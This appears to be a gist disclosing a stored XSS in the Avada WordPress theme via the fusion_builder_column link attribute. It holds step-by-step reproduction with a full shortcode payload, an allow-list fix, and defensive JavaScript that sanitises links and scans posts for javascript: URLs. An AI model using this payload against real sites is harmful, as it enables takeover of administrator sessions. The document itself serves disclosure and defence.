@Xib3rR4dAr
Last active March 1, 2024 23:46
Avada <= 7.11.6 Contributor+ Stored XSS (fusion_builder_column)

Avada <= 7.11.6 Contributor+ Stored XSS

Exploit Author: Muhammad Zeeshan (Xib3rR4dAr)

Description:

The Avada | Website Builder For WordPress & WooCommerce theme for WordPress is vulnerable to Stored Cross-Site Scripting via the link attribute of the fusion_builder_column shortcode in versions up to, and including, 7.11.6, due to insufficient input sanitization and output escaping of user-supplied attributes. This makes it possible for authenticated attackers with Contributor-level and above permissions to inject arbitrary web scripts into pages; the script executes whenever a user accesses the injected page and clicks inside the column. Avada lets a column act as a link by setting its link attribute, and the value is not restricted to safe URL schemes. By exploiting the XSS an attacker can perform actions on behalf of the victim, for example creating a backdoor administrator account when an administrator previews the submitted post and clicks the column.
The link parameter/attribute of the fusion_builder_column shortcode can be set to a javascript: URL, which runs attacker-controlled JS when the column is clicked:

link="javascript:alert(&#x27;XSS&#x27;)"

Reproduction Steps:

  1. Log in as a Contributor user
  2. Visit http://192.168.253.1/wp-admin/post-new.php
  3. Enter any name for the Post Title
  4. In the editor the "Text" tab should already be selected; if not, click the "Text" tab. Paste the following shortcode into it:
[fusion_builder_container type="flex" hundred_percent="no" hundred_percent_height="no" hundred_percent_height_scroll="no" align_content="stretch" flex_align_items="flex-start" flex_justify_content="flex-start" flex_wrap="wrap" hundred_percent_height_center_content="yes" equal_height_columns="no" container_tag="div" hide_on_mobile="small-visibility,medium-visibility,large-visibility" status="published" border_style="solid" box_shadow_blur="0" box_shadow_spread="0" background_color="" gradient_start_color="" gradient_end_color="" gradient_start_position="0" gradient_end_position="100" gradient_type="linear" radial_direction="center center" linear_angle="180" background_image_medium="" background_image_small="" background_image="" skip_lazy_load="" background_position_medium="" background_position_small="" background_position="center center" background_repeat_medium="" background_repeat_small="" background_repeat="no-repeat" background_size_medium="" background_size_small="" background_size="" background_custom_size="" background_custom_size_medium="" background_custom_size_small="" fade="no" background_parallax="none" enable_mobile="no" parallax_speed="0.3" background_blend_mode_medium="" background_blend_mode_small="" background_blend_mode="none" background_slider_images="" background_slider_position="" background_slider_skip_lazy_loading="no" background_slider_loop="yes" background_slider_pause_on_hover="no" background_slider_slideshow_speed="5000" background_slider_animation="fade" background_slider_direction="up" background_slider_animation_speed="800" background_slider_blend_mode="" video_mp4="" video_webm="" video_ogv="" video_url="" video_aspect_ratio="16:9" video_loop="yes" video_mute="yes" video_preview_image="" pattern_bg="none" pattern_custom_bg="" pattern_bg_color="" pattern_bg_style="default" pattern_bg_opacity="100" pattern_bg_size="" pattern_bg_blend_mode="normal" mask_bg="none" mask_custom_bg="" mask_bg_color="" mask_bg_accent_color="" 
mask_bg_style="default" mask_bg_opacity="100" mask_bg_transform="left" mask_bg_blend_mode="normal" render_logics="" logics="" absolute="off" absolute_devices="small,medium,large" sticky="off" sticky_devices="small-visibility,medium-visibility,large-visibility" sticky_background_color="" sticky_height="" sticky_offset="" sticky_transition_offset="0" scroll_offset="0" animation_type="" animation_direction="left" animation_color="" animation_speed="0.3" animation_delay="0" animation_offset="" filter_hue="0" filter_saturation="100" filter_brightness="100" filter_contrast="100" filter_invert="0" filter_sepia="0" filter_opacity="100" filter_blur="0" filter_hue_hover="0" filter_saturation_hover="100" filter_brightness_hover="100" filter_contrast_hover="100" filter_invert_hover="0" filter_sepia_hover="0" filter_opacity_hover="100" filter_blur_hover="0"][fusion_builder_row][fusion_builder_column type="1_1" layout="1_1" align_self="auto" content_layout="column" align_content="flex-start" valign_content="flex-start" content_wrap="wrap" spacing="" center_content="no" column_tag="div" link="javascript:alert(&#x27;XSS&#x27;)" target="_self" link_description="" min_height="" hide_on_mobile="small-visibility,medium-visibility,large-visibility" sticky_display="normal,sticky" class="" id="" type_medium="" type_small="" flex_grow_medium="" flex_grow_small="" flex_grow="" flex_shrink_medium="" flex_shrink_small="" flex_shrink="" order_medium="0" order_small="0" spacing_left_medium="" spacing_right_medium="" spacing_left_small="" spacing_right_small="" spacing_left="" spacing_right="" margin_top_medium="" margin_bottom_medium="" margin_top_small="" margin_bottom_small="" margin_top="" margin_bottom="" padding_top_medium="" padding_right_medium="" padding_bottom_medium="" padding_left_medium="" padding_top_small="" padding_right_small="" padding_bottom_small="" padding_left_small="" padding_top="" padding_right="" padding_bottom="" padding_left="" hover_type="none" border_sizes_top="" 
border_sizes_right="" border_sizes_bottom="" border_sizes_left="" border_color_hover="" hue="" saturation="" lightness="" alpha="" border_color="" border_style="solid" border_radius_top_left="" border_radius_top_right="" border_radius_bottom_right="" border_radius_bottom_left="" box_shadow="no" box_shadow_vertical="" box_shadow_horizontal="" box_shadow_blur="0" box_shadow_spread="0" box_shadow_color="" box_shadow_style="" z_index_hover="" z_index="" overflow="" background_type="single" background_color_medium="" background_color_small="" background_color_medium_hover="" background_color_small_hover="" background_color_hover="" background_color="" gradient_start_color="" gradient_end_color="" gradient_start_position="0" gradient_end_position="100" gradient_type="linear" radial_direction="center center" linear_angle="180" background_image_medium="" background_image_small="" background_image="" background_image_id_medium="" background_image_id_small="" background_image_id="" lazy_load="none" skip_lazy_load="" background_position_medium="" background_position_small="" background_position="left top" background_repeat_medium="" background_repeat_small="" background_repeat="no-repeat" background_size_medium="" background_size_small="" background_size="" background_custom_size="" background_custom_size_medium="" background_custom_size_small="" background_blend_mode_medium="" background_blend_mode_small="" background_blend_mode="none" background_slider_images="" background_slider_position="" background_slider_skip_lazy_loading="no" background_slider_loop="yes" background_slider_pause_on_hover="no" background_slider_slideshow_speed="5000" background_slider_animation="fade" background_slider_direction="up" background_slider_animation_speed="800" background_slider_blend_mode="" render_logics="" sticky="off" sticky_devices="small-visibility,medium-visibility,large-visibility" sticky_offset="" absolute="off" absolute_top="" absolute_right="" absolute_bottom="" absolute_left="" 
filter_type="regular" filter_hover_element="self" filter_hue_hover="0" filter_saturation_hover="100" filter_brightness_hover="100" filter_contrast_hover="100" filter_invert_hover="0" filter_sepia_hover="0" filter_opacity_hover="100" filter_blur_hover="0" filter_hue="0" filter_saturation="100" filter_brightness="100" filter_contrast="100" filter_invert="0" filter_sepia="0" filter_opacity="100" filter_blur="0" transform_type="regular" transform_hover_element="self" transform_scale_x_hover="1" transform_scale_y_hover="1" transform_translate_x_hover="0" transform_translate_y_hover="0" transform_rotate_hover="0" transform_skew_x_hover="0" transform_skew_y_hover="0" transform_scale_x="1" transform_scale_y="1" transform_translate_x="0" transform_translate_y="0" transform_rotate="0" transform_skew_x="0" transform_skew_y="0" transform_origin="" transition_duration="300" transition_easing="ease" transition_custom_easing="" motion_effects="W10=" scroll_motion_devices="small-visibility,medium-visibility,large-visibility" animation_type="" animation_direction="left" animation_color="" animation_speed="0.3" animation_delay="0" animation_offset="" last="true" border_position="all" first="true"][fusion_pricing_table type="1" backgroundcolor="" hue="" saturation="" lightness="" alpha="" background_color_hover="" bordercolor="" dividercolor="" heading_color_style_1="" heading_color_style_2="" pricing_color="" body_text_color="" margin_top="" margin_right="" margin_bottom="" margin_left="" hide_on_mobile="small-visibility,medium-visibility,large-visibility" class="" id="" columns="2"][fusion_pricing_column title="Standard" standout="no"][fusion_pricing_price currency="$" currency_position="left" price="15.55" time="monthly" ][/fusion_pricing_price][fusion_pricing_row]Feature 1[/fusion_pricing_row][fusion_pricing_row]Feature 2[/fusion_pricing_row][fusion_pricing_footer]Click for more info[/fusion_pricing_footer][/fusion_pricing_column][fusion_pricing_column title="Premium" 
standout="yes"][fusion_pricing_price currency="$" currency_position="left" price="25.55" time="monthly" ][/fusion_pricing_price][fusion_pricing_row]Feature 1[/fusion_pricing_row][fusion_pricing_row]Feature 2[/fusion_pricing_row][fusion_pricing_footer]Click for more info[/fusion_pricing_footer][/fusion_pricing_column][/fusion_pricing_table][/fusion_builder_column][/fusion_builder_row][/fusion_builder_container]
  5. Click "Submit for review"
  6. Log out of the Contributor user
  7. Log in as an Administrator user
  8. Visit http://192.168.253.1/wp-admin/edit.php
  9. Click "Preview" on the post created by the Contributor user
  10. Clicking anywhere inside the column, e.g. on the pricing table, triggers the XSS.

Author-level and higher users do not need the review step: they can publish a post containing the shortcode directly, and the XSS then triggers for any visitor who views the post and clicks inside the column.

Fix:

Only allow whitelisted protocols such as http and https in the link attribute of fusion_builder_column (an allow-list of schemes, not a deny-list of javascript:), and apply the check when the attribute is output, not only when the post is saved.
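The allow-list the fix calls for, written out as an added example in JavaScript. This is not Avada's code: the theme's renderer is PHP, where WordPress's esc_url() already returns an empty string for a URL whose protocol is outside wp_allowed_protocols(). The function and constant names here and the trimmed sample shortcode are assumptions made for the example. The scheme check decodes HTML character references and strips the whitespace a URL parser ignores before it looks at the scheme, because a bare string match on "javascript:" misses the obfuscated forms; the scanner at the end runs the same check over stored post content to find columns that have already been planted, which serves both the javascript: description above and this fix.

```javascript
// Added example (not Avada's code): an allow-list check for the `link`
// attribute of fusion_builder_column, plus a scanner that finds stored
// shortcodes whose link would fail that check. Names are assumptions.

const ALLOWED_SCHEMES = new Set(["http", "https", "mailto", "tel"]);

// Decode the HTML character references a browser would decode once the
// attribute value lands in an href. Numeric (&#106; / &#x6A;) and the few
// named ones that matter for URLs are handled; unknown references are kept.
function decodeEntities(s) {
  const named = { amp: "&", lt: "<", gt: ">", quot: '"', apos: "'" };
  return s.replace(/&(#x[0-9a-f]+|#[0-9]+|[a-z]+);/gi, (m, body) => {
    if (body[0] === "#") {
      const cp = body[1].toLowerCase() === "x"
        ? parseInt(body.slice(2), 16)
        : parseInt(body.slice(1), 10);
      return Number.isFinite(cp) && cp <= 0x10ffff ? String.fromCodePoint(cp) : m;
    }
    return named[body.toLowerCase()] ?? m;
  });
}

// Normalise the way a URL parser does before it looks for a scheme:
// strip C0 controls/space at both ends and tab/CR/LF anywhere, then lower-case.
function normalizeUrl(raw) {
  return decodeEntities(String(raw))
    .replace(/^[\u0000-\u0020]+|[\u0000-\u0020]+$/g, "")
    .replace(/[\t\r\n]/g, "")
    .toLowerCase();
}

// Returns the scheme ("javascript", "https", ...) or null for scheme-less
// (relative) URLs. A scheme is a letter, then letters/digits/+/-/., then ':'.
function extractScheme(raw) {
  const m = /^([a-z][a-z0-9+.\-]*):/.exec(normalizeUrl(raw));
  return m ? m[1] : null;
}

// Allow-list check: relative URLs and the listed schemes pass; everything
// else (javascript:, data:, vbscript:, ...) is rejected.
function isSafeLink(raw) {
  const scheme = extractScheme(raw);
  return scheme === null || ALLOWED_SCHEMES.has(scheme);
}

// What the renderer should emit: the link unchanged when safe, empty otherwise.
function sanitizeLink(raw) {
  return isSafeLink(raw) ? String(raw) : "";
}

// Detection sweep: pull every link="..." out of fusion_builder_column opening
// tags in post content and report the values that fail the check.
function findUnsafeColumnLinks(postContent) {
  const unsafe = [];
  const shortcode = /\[fusion_builder_column\b([^\]]*)\]/g;
  let sc;
  while ((sc = shortcode.exec(postContent)) !== null) {
    const attr = /\blink=(?:"([^"]*)"|'([^']*)')/i.exec(sc[1]);
    if (!attr) continue;
    const value = attr[1] ?? attr[2];
    if (!isSafeLink(value)) unsafe.push(value);
  }
  return unsafe;
}

// Constructed sample: a trimmed-down version of the shortcode from the
// reproduction steps (most attributes removed), plus a benign second column.
const SAMPLE_POST = [
  '[fusion_builder_container type="flex"][fusion_builder_row]',
  '[fusion_builder_column type="1_1" layout="1_1" link="javascript:alert(&#x27;XSS&#x27;)" target="_self" last="true"]',
  "...[/fusion_builder_column]",
  '[fusion_builder_column type="1_1" layout="1_1" link="https://example.com/pricing" target="_self" last="true"]',
  "...[/fusion_builder_column]",
  "[/fusion_builder_row][/fusion_builder_container]",
].join("\n");

console.log("unsafe column links:", findUnsafeColumnLinks(SAMPLE_POST));
```

Run with `node` to list the offending link values in the sample. The check is an allow-list on the parsed scheme rather than a search for the string "javascript:", so variants such as `JaVaScRiPt:`, `java<TAB>script:`, leading whitespace, and entity-encoded letters (`&#106;avascript:`) are all rejected, while relative paths and http/https/mailto/tel links pass untouched.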
